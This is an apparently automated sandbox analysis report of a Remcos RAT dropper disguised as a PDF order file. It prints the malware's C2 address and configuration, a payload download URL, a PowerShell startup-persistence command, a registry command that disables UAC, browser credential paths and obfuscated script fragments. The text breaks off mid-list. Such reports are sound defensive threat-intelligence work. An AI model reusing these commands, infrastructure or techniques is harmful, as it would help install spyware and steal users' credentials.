Edit tour

Windows Analysis Report
Order Specifications PDF.js

Overview

General Information

Sample Name:	Order Specifications PDF.js
Analysis ID:	737570
MD5:	2f2dd87407ef0c27a76906745df56ec0
SHA1:	cec4a6dd3d0fa67524e93b1f8906ff5c15bf7f22
SHA256:	c074cae77f4adf2af92380ce03345d6abaf16ea5442690f18574429ce2538958
Tags:	jsRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Copy file to startup via Powershell

Multi AV Scanner detection for submitted file

JScript performs obfuscated calls to suspicious functions

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Remcos RAT

Sigma detected: Remcos

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Installs a global keyboard hook

JavaScript source code contains functionality to generate code involving a shell, file or stream

Drops PE files to the startup folder

Writes to foreign memory regions

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Powershell drops PE file

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Deletes itself after installation

Potential obfuscated javascript found

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5252 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Specifications PDF.js" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

VNZVNCXKKJSF.exe (PID: 5516 cmdline: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)

powershell.exe (PID: 5224 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

Systedbddfm.exe (PID: 820 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe" MD5: 5ED905205AEB85AF64B2FF567A8CF838)

powershell.exe (PID: 3712 cmdline: "Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x66a28:$a1: Remcos restarted by watchdog! 0x66f80:$a3: %02i:%02i:%02i:%03i 0x67305:$a4: * Remcos v
0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xdd518:$a1: Remcos restarted by watchdog! 0x152b78:$a1: Remcos restarted by watchdog! 0xdda70:$a3: %02i:%02i:%02i:%03i 0x1530d0:$a3: %02i:%02i:%02i:%03i 0xdddf5:$a4: * Remcos v 0x153455:$a4: * Remcos v
00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x131e0:$a1: Remcos restarted by watchdog! 0x13738:$a3: %02i:%02i:%02i:%03i 0x13abd:$a4: * Remcos v
Process Memory Space: VNZVNCXKKJSF.exe PID: 5516	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: VNZVNCXKKJSF.exe PID: 5516	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xe768:$a1: Remcos restarted by watchdog! 0xec9f:$a3: %02i:%02i:%02i:%03i 0xf258:$a3: %02i:%02i:%02i:%03i 0xeec1:$a4: * Remcos v
Process Memory Space: powershell.exe PID: 5224	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 480	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 480	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf9e9:$a1: Remcos restarted by watchdog! 0xff20:$a3: %02i:%02i:%02i:%03i 0x104d9:$a3: %02i:%02i:%02i:%03i 0x10142:$a4: * Remcos v
Process Memory Space: powershell.exe PID: 3712	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
13.0.RegSvcs.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe
13.0.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v
13.0.RegSvcs.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x629e4:$str_a1: C:\Windows\System32\cmd.exe 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x61a0c:$str_b2: Executing file: 0x62b28:$str_b3: GetDirectListeningPort 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x62630:$str_b7: \update.vbs 0x61a34:$str_b9: Downloaded file: 0x61a20:$str_b10: Downloading file: 0x61ac4:$str_b12: Failed to upload file: 0x62af0:$str_b13: StartForward 0x62b10:$str_b14: StopForward 0x625d8:$str_b15: fso.DeleteFile " 0x6256c:$str_b16: On Error Resume Next 0x62608:$str_b17: fso.DeleteFolder " 0x61ab4:$str_b18: Uploaded file: 0x61a74:$str_b19: Unable to delete: 0x625a0:$str_b20: while fso.FileExists(" 0x61f49:$str_c0: [Firefox StoredLogins not found]
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60100:$s1: \Classes\mscfile\shell\open\command 0x60160:$s1: \Classes\mscfile\shell\open\command 0x60148:$s2: eventvwr.exe
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x661e0:$a1: Remcos restarted by watchdog! 0x66738:$a3: %02i:%02i:%02i:%03i 0x66abd:$a4: * Remcos v
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x611e4:$str_a1: C:\Windows\System32\cmd.exe 0x61160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x60610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x60e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6020c:$str_b2: Executing file: 0x61328:$str_b3: GetDirectListeningPort 0x60c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x60e30:$str_b7: \update.vbs 0x60234:$str_b9: Downloaded file: 0x60220:$str_b10: Downloading file: 0x602c4:$str_b12: Failed to upload file: 0x612f0:$str_b13: StartForward 0x61310:$str_b14: StopForward 0x60dd8:$str_b15: fso.DeleteFile " 0x60d6c:$str_b16: On Error Resume Next 0x60e08:$str_b17: fso.DeleteFolder " 0x602b4:$str_b18: Uploaded file: 0x60274:$str_b19: Unable to delete: 0x60da0:$str_b20: while fso.FileExists(" 0x60749:$str_c0: [Firefox StoredLogins not found]
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61900:$s1: \Classes\mscfile\shell\open\command 0x61960:$s1: \Classes\mscfile\shell\open\command 0xd6f60:$s1: \Classes\mscfile\shell\open\command 0xd6fc0:$s1: \Classes\mscfile\shell\open\command 0x61948:$s2: eventvwr.exe 0xd6fa8:$s2: eventvwr.exe
10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x679e0:$a1: Remcos restarted by watchdog! 0xdd040:$a1: Remcos restarted by watchdog! 0x67f38:$a3: %02i:%02i:%02i:%03i 0xdd598:$a3: %02i:%02i:%02i:%03i 0x682bd:$a4: * Remcos v 0xdd91d:$a4: * Remcos v
Click to see the 6 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Author: Joe Security: Data: Command: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', CommandLine|base64offset|contains: r^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe, ParentProcessId: 5516, ParentProcessName: VNZVNCXKKJSF.exe, ProcessCommandLine: "Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe', ProcessId: 5224, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 480, TargetFilename: C:\ProgramData\remcos\logs.dat

Snort Signatures

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858595532012811 11/03/22-23:35:55.641128
SID:	2012811
Source Port:	58595
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Order Specifications PDF.js	ReversingLabs: Detection: 26%
Source: Order Specifications PDF.js	Virustotal: Detection: 25%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

Antivirus detection for URL or domain

Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo	Avira URL Cloud: Label: phishing
Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe	Avira URL Cloud: Label: malware
Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for domain / URL

Source: tgc8x.tk	Virustotal: Detection: 5%			Perma Link
Source: https://tgc8x.tk/tt/VNZVNCXKKJSF.exe	Virustotal: Detection: 13%			Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	ReversingLabs: Detection: 65%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe	Joe Sandbox ML: detected

Source: 13.0.RegSvcs.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 10.0.VNZVNCXKKJSF.exe.540000.0.unpack	Avira: Label: TR/Dropper.Gen

Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "51.75.209.245:2404:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-CMFPLR", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Source: VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown

HTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.6:49710 version: TLS 1.2

Source:	Binary string: RuDl.pdb source: VNZVNCXKKJSF.exe, 0000000A.00000002.414602354.0000000002920000.00000004.08000000.00040000.00000000.sdmp, VNZVNCXKKJSF.exe, 0000000A.00000002.414888406.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, Systedbddfm.exe, 00000011.00000002.707496328.0000000002C50000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdbBSJB source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr
Source:	Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\VNZVNCXKKJSF.pdb source: Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: Order Specifications PDF.js	Return value : ['uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Argument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Argument value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 'Send,Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5t']	Go to definition
Source: Order Specifications PDF.js	Return value : ['toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcL', 'Open,DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,A', '"Shell.Application"', 'DeleteFile,ymoxo2tdK1n6gZtdKCkExSkSxCoXW53dU8kGDhZdUJ/cL3CwdW,428748eDivLq,uqtdR8kPceWHW5tdNW,AJ3cTm', 'ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGV', 'uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsS', '"Scripting.FileSystemObject","RY1%"', '"Scripting.FileSystemObject"', 'dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt', '"SaveToFile"', '"Scripting.FileSystemObject","m*X5"', '"ADODB.Stream"', 